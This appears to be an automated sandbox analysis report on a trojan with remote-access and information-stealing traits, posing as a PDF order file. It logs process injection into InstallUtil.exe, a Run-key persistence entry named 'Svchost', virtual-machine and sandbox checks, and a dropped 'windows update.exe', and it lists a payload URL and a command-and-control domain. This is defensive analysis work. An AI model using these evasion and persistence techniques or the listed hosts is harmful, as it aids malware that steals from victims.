                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Svchost

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | delete
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\SubDir\windows update.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Memory allocated: F20000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Memory allocated: 2880000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Memory allocated: 4880000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Memory allocated: 72E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Memory allocated: 6AA0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 1800000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 3230000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 5230000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: CA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: 27A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: 47A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: BE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: 2770000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: 2800000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Memory allocated: 29C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeWindow / User API: threadDelayed 2459Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeWindow / User API: threadDelayed 7335Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 528Thread sleep count: 2459 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 528Thread sleep count: 7335 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99886s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99777s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99016s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98655s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98076s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97402s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97074s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95378s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -94906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -94797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5168Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe TID: 1412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe TID: 7104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe TID: 4996Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99886Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99777Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99672Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99562Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99453Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99343Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99234Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99125Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99016Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98891Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98766Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98655Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98547Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98437Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98328Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98218Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98076Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97953Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97844Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97734Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97625Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97516Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97402Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97297Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97187Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97074Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96969Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96859Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96750Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96640Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96531Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96422Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96312Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96203Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96093Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95984Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95875Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95766Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95656Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95500Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95378Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95234Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95125Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95015Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 94906Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 94797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2244498222.0000000005430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 720000
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 722000
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1090008
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Queries volume information: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe; Queries volume information: C:\Users\user\AppData\Roaming\SubDir\windows update.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe; Queries volume information: C:\Users\user\AppData\Roaming\SubDir\windows update.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe; Queries volume information: C:\Users\user\AppData\Roaming\SubDir\windows update.exe VolumeInformation
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR
MITRE ATT&CK Matrix

The matrix is listed here one tactic per line, in the original column order; where the original cell carried a number beside the technique name, that number is kept in parentheses.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Scheduled Task/Job (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Scheduled Task/Job (1), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (211), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (211), Hidden Files and Directories (1), Obfuscated Files or Information (21), Software Packing (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Information Discovery (12), Wi-Fi Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph (rendered graph not preserved; the information recoverable from it follows)

Behavior Graph ID: 1557778; Sample: Order8898327329372938729382...; Start date: 18/11/2024; Architecture: WINDOWS; Score: 100
Contacted hosts: www.oleonidas.gr; oleonidas.gr (185.78.221.73, port 443 from local port 49704, IPHOSTGRIpDomainGR, Greece)
Signatures on the sample: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures

Process tree:
Order88983273293729387293828PDF.exe (started)
    Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
    InstallUtil.exe (started)
        Dropped file: C:\Users\user\AppData\...\windows update.exe, PE32
        Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
        windows update.exe (started)
            conhost.exe (started)
windows update.exe (started)
    conhost.exe (started)
windows update.exe (started)
    conhost.exe (started)

                  SourceDetectionScannerLabelLink
                  Order88983273293729387293828PDF.exe37%ReversingLabsWin32.Trojan.Generic
                  Order88983273293729387293828PDF.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\SubDir\windows update.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://entityframework-extensions.net/md5-exception | 0% | Avira URL Cloud | safe |
https://bulk-operations.net$Microsoft.Data.SqlClient.SqlBulkCopyEThe | 0% | Avira URL Cloud | safe |
https://bulk-operations.net/pricing. | 0% | Avira URL Cloud | safe |
https://dapper-plus.net/pricing. | 0% | Avira URL Cloud | safe |
http://www.zzzprojects.com | 0% | Avira URL Cloud | safe |
https://www.oleonidas.gr | 0% | Avira URL Cloud | safe |
https://bulk-operations.net | 0% | Avira URL Cloud | safe |
https://dapper-plus.net/getting-started-mapping#instance-context-mapping. | 0% | Avira URL Cloud | safe |
https://dapper-plus.net#Oops | 0% | Avira URL Cloud | safe |
https://entityframework-extensions.net/) | 0% | Avira URL Cloud | safe |
https://entityframework-extensions.net/include-graph). | 0% | Avira URL Cloud | safe |
https://dapper-plus.net/getting-started-mapping#instance-context-mapping | 0% | Avira URL Cloud | safe |
https://entityframework-extensions.net/pricing. | 0% | Avira URL Cloud | safe |
nwamama.ydns.eu | 0% | Avira URL Cloud | safe |
https://www.oleonidas.gr/mansa/Vurfw.wav | 0% | Avira URL Cloud | safe |
http://entityframework-plus.net/ | 0% | Avira URL Cloud | safe |
https://linqtosql-plus.net/pricing. | 0% | Avira URL Cloud | safe |
https://entityframework-extensions.net/md5-exceptionX | 0% | Avira URL Cloud | safe |
https://dapper-plus.net | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
oleonidas.gr | 185.78.221.73 | true | false | | unknown
www.oleonidas.gr | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.oleonidas.gr/mansa/Vurfw.wav | false | Avira URL Cloud: safe | unknown
nwamama.ydns.eu | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
